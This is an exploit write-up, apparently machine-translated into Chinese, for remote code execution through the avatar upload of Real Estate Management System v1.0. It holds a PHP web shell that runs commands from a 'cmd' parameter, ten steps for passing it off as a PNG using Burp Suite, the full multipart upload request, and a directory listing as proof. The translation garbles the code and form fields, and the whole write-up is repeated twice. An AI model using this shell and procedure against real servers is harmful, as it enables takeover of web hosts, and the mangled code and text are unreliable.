#利用标题:房地产管理系统v1.0-通过文件上传执行远程代码
#日期: 2/11/2024
#利用作者: Diyar Saadi
#供应商homepage: https://codeastro.com
#版本: V1.0
#测试在: Windows 11 + XAMPP 8.0.30 + BURP Suite Professional V2023.12.1.3
## 描述##
此漏洞使攻击者可以执行命令注入有效载荷并将恶意文件上传到Web服务器中。
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##简单RCE有效载荷: ##
html
身体
form method='get'name='?php echo basename($ _ server ['php_self']);
输入类型='text'名称='cmd'autocus id='cmd'size='80'
输入类型='submit'value='execute'
/形式
pre
php
if(isset($ _ get ['cmd']))
{
system_payload($ _ get ['cmd']);
}
?
/pre
/身体
/html
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##重现##的步骤
1-开放式Burp Suite(社区+专业) +单击代理选项卡,然后通过单击截距启用拦截。
2-从代理选项卡打开浏览器,然后打开Resgister网页: http://localhost:8080/realestate/register.php
3-从记事本或任何编辑器中准备RCE PHP脚本基础,然后将RCE PHP脚本库保存为: Avatar.php文件名。
4-在保存RCE PHP脚本之后,将文件名扩展名更改为Avatar.png。
5-单击从用户图像部分中选择文件,然后上传您的avatar.png文件。
6-单击注册,然后返回到Burp Suite代理选项卡:
7-将文件扩展名修改为示例: content-disposition: form-data中的原始文件扩展名为: avatar.php;名称='uimage';文件名='avatar.png'
content-type:图像/png。
8-将Burp Suite代理选项卡中的内容分配到Orginal文件扩展名中,请单击前向按钮。
9-打开登录页面: http://localhost:8080/realestate/login.php,然后通过您的帐户电子邮件密码注册。
10-从Menubar单击我的帐户配置文件,然后右键单击图标复制链接链接新选项卡粘贴您的恶意命令已准备好执行。
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
## Burp请求: ##
post/realestate/register.php http/1.1
HOST: LOCALHOST
内容长度: 1100
cache-control: max-age=0
sec-ch-ua:'铬'; v='121','不是(品牌'; v='99'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- WebKitFormBoundaryWa99kzoAu8apGlHV
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/121.0.6167.85 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/realestate/register.php
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
连接:关闭
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='名称'
约翰河
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='电子邮件'
[email protected]
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='电话'
+199988764
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='PASS'
html身体表单方法='get'name='?输入type='text'name='cmd'autocus id='cmd'size='80'input type='smist'value='execute'eccute'eccute'receute'receute'receute'receute' /pre? }? /pre /html
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='utype'
用户
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='uimage'; filename='avatar.php'
content-type:图像/png
html
身体
form method='get'name='?php echo basename($ _ server ['php_self']);
输入类型='text'名称='cmd'autocus id='cmd'size='80'
输入类型='submit'value='execute'
/形式
pre
php
if(isset($ _ get ['cmd']))
{
系统($ _ get ['cmd']);
}
?
/pre
/身体
/html
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='reg'
登记
------ webkitformboundarypgw90eleirxrzcek--
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
## POC简单rce通过此漏洞: ##
C:的目录\ Xampp \ htdocs \ realEstate \ admin \ user
.
02/11/2024 08:09 PM 315 AVATAR.PHP
02/11/2024 08:04 PM 315 Avatar.png
02/11/2024 06:54 PM 9,376 AVATARM2-MIN.jpg
02/11/2024 06:54 PM 13,186 AVATARM7-MIN.jpg
02/11/2024 07:47 PM 1,814 Avatars.php
02/11/2024 06:54 PM 1,313 GR7.PNG
02/11/2024 07:36 PM 28 POC.PHP
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##视频POC : ##
1- https://github.com/VULNERABLECMS/RCE-REALESTATEVIEDOPOC/BLOB/MAIN/POC-RCE.MP4
2- https://gofile.io/d/aewegi
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
问候!
#日期: 2/11/2024
#利用作者: Diyar Saadi
#供应商homepage: https://codeastro.com
#版本: V1.0
#测试在: Windows 11 + XAMPP 8.0.30 + BURP Suite Professional V2023.12.1.3
## 描述##
此漏洞使攻击者可以执行命令注入有效载荷并将恶意文件上传到Web服务器中。
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##简单RCE有效载荷: ##
html
身体
form method='get'name='?php echo basename($ _ server ['php_self']);
输入类型='text'名称='cmd'autocus id='cmd'size='80'
输入类型='submit'value='execute'
/形式
pre
php
if(isset($ _ get ['cmd']))
{
system_payload($ _ get ['cmd']);
}
?
/pre
/身体
/html
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##重现##的步骤
1-开放式Burp Suite(社区+专业) +单击代理选项卡,然后通过单击截距启用拦截。
2-从代理选项卡打开浏览器,然后打开Resgister网页: http://localhost:8080/realestate/register.php
3-从记事本或任何编辑器中准备RCE PHP脚本基础,然后将RCE PHP脚本库保存为: Avatar.php文件名。
4-在保存RCE PHP脚本之后,将文件名扩展名更改为Avatar.png。
5-单击从用户图像部分中选择文件,然后上传您的avatar.png文件。
6-单击注册,然后返回到Burp Suite代理选项卡:
7-将文件扩展名修改为示例: content-disposition: form-data中的原始文件扩展名为: avatar.php;名称='uimage';文件名='avatar.png'
content-type:图像/png。
8-将Burp Suite代理选项卡中的内容分配到Orginal文件扩展名中,请单击前向按钮。
9-打开登录页面: http://localhost:8080/realestate/login.php,然后通过您的帐户电子邮件密码注册。
10-从Menubar单击我的帐户配置文件,然后右键单击图标复制链接链接新选项卡粘贴您的恶意命令已准备好执行。
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
## Burp请求: ##
post/realestate/register.php http/1.1
HOST: LOCALHOST
内容长度: 1100
cache-control: max-age=0
sec-ch-ua:'铬'; v='121','不是(品牌'; v='99'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- WebKitFormBoundaryWa99kzoAu8apGlHV
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/121.0.6167.85 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/realestate/register.php
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
连接:关闭
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='名称'
约翰河
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='电子邮件'
[email protected]
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='电话'
+199988764
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='PASS'
html身体表单方法='get'name='?输入type='text'name='cmd'autocus id='cmd'size='80'input type='smist'value='execute'eccute'eccute'receute'receute'receute'receute' /pre? }? /pre /html
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='utype'
用户
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='uimage'; filename='avatar.php'
content-type:图像/png
html
身体
form method='get'name='?php echo basename($ _ server ['php_self']);
输入类型='text'名称='cmd'autocus id='cmd'size='80'
输入类型='submit'value='execute'
/形式
pre
php
if(isset($ _ get ['cmd']))
{
系统($ _ get ['cmd']);
}
?
/pre
/身体
/html
------ webkitformboundarypgw90eleirxrzcek
content-disposition: form-data;名称='reg'
登记
------ webkitformboundarypgw90eleirxrzcek--
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
## POC简单rce通过此漏洞: ##
C:的目录\ Xampp \ htdocs \ realEstate \ admin \ user
.
02/11/2024 08:09 PM 315 AVATAR.PHP
02/11/2024 08:04 PM 315 Avatar.png
02/11/2024 06:54 PM 9,376 AVATARM2-MIN.jpg
02/11/2024 06:54 PM 13,186 AVATARM7-MIN.jpg
02/11/2024 07:47 PM 1,814 Avatars.php
02/11/2024 06:54 PM 1,313 GR7.PNG
02/11/2024 07:36 PM 28 POC.PHP
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
##视频POC : ##
1- https://github.com/VULNERABLECMS/RCE-REALESTATEVIEDOPOC/BLOB/MAIN/POC-RCE.MP4
2- https://gofile.io/d/aewegi
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
问候!